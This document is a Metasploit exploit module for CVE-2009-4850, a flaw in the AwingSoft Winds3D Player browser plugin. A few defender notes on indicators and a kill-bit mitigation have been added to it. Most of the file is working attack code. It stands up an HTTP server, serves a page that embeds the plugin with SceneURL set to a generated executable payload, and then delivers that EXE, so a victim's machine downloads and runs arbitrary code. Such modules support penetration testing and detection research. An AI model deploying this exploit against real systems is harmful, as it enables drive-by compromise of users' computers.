metasploit-framework/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Browser-delivered module for CVE-2009-4850 (OSVDB 60049) in the AwingSoft
# Winds3D Player plugin.
#
# Per the module description, the plugin downloads and runs whatever its
# 'SceneURL' parameter points at, so the issue is untrusted program execution
# by design rather than memory corruption. The module answers two kinds of
# request from its built-in HTTP server: a landing page that embeds the plugin,
# and a generated EXE served from "<resource>/payload".
#
# Defender notes (all taken from the markup served below):
# - Observable indicator: a page instantiating classid
#   17A54E7D-A9D4-11D8-9552-00E04CB09903, or an <embed> of MIME type
#   application/x-awingsoft-winds3d, whose SceneURL/src resolves to an
#   executable (served here as application/octet-stream).
# - The <object> tag carries a codebase attribute pointing at the vendor CAB,
#   so a host without the control may be offered an install -- presumably
#   widening exposure beyond machines that already have it; verify per browser.
# - No fixed plugin version is named on this page. Removing the plugin or
#   blocking the control (e.g. an ActiveX kill bit for the CLSID above) is the
#   mitigation to evaluate.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # Registers the module metadata (name, references, payload constraints and
  # the single automatic target) with the framework.
  #
  # @param info [Hash] metadata passed in by the framework, merged via update_info
  def initialize(info = {})
    # Raw (non-interpolating) heredoc; the leading blank line keeps the text
    # identical to the original %q{} literal, which began with a newline.
    description = <<~'DESC'

      This module exploits an untrusted program execution vulnerability within the
      Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for
      IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'
      parameter to the URL to an executable, an attacker can execute arbitrary
      code.

      Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and
      IE 8 on Windows XP SP3.
    DESC

    module_info = {
      'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute',
      'Description' => description,
      'License' => MSF_LICENSE,
      'Author' => [
        'jduck' # original discovery & metasploit module
      ],
      'References' => [
        ['CVE', '2009-4850'],
        ['OSVDB', '60049']
      ],
      'Payload' => {
        'Space' => 2048,
        'StackAdjustment' => -3500
      },
      'Platform' => 'win',
      'Targets' => [
        ['Automatic', {}]
      ],
      'DisclosureDate' => 'Nov 14 2009',
      'DefaultTarget' => 0
    }

    super(update_info(info, module_info))
  end

  # HTTP request callback. Requests whose URI matches /payload/ receive the
  # generated EXE; every other request receives the HTML page that embeds the
  # plugin with SceneURL set to the payload URL.
  #
  # @param cli the connected client; only cli.peerhost is read directly here
  # @param request the incoming HTTP request; only request.uri is inspected
  def on_request_uri(cli, request)
    # When bound to the wildcard address, advertise the local address that
    # routes to this client instead of the literal 0.0.0.0.
    bind_host = datastore['SRVHOST']
    host = bind_host == '0.0.0.0' ? Rex::Socket.source_address(cli.peerhost) : bind_host
    payload_url = 'http://' + host + ':' + datastore['SRVPORT'].to_s + get_resource + '/payload'

    # NOTE(review): the match is an unanchored substring test, so any URI
    # containing "payload" takes the EXE branch.
    unless request.uri.match(/payload/)
      # Landing page: both the IE <object> form and the <embed> form point the
      # plugin at the payload URL.
      html = <<~HTML
        <html>
        <body>
        <object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'
        codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>
        <param name="SceneURL" value="#{payload_url}#">
        <embed type="application/x-awingsoft-winds3d" src="#{payload_url}">
        </object>
      HTML

      print_status("Sending #{self.name} HTML")
      return send_response(cli, html, { 'Content-Type' => 'text/html' })
    end

    generated = regenerate_payload(cli)
    return if generated.nil?

    exe = generate_payload_exe({ :code => generated.encoded })
    print_status('Sending EXE payload')
    send_response(cli, exe, { 'Content-Type' => 'application/octet-stream' })

    # The original leaves the handler(cli) call commented out; that is kept,
    # and this branch returns nil as before.
    nil
  end
end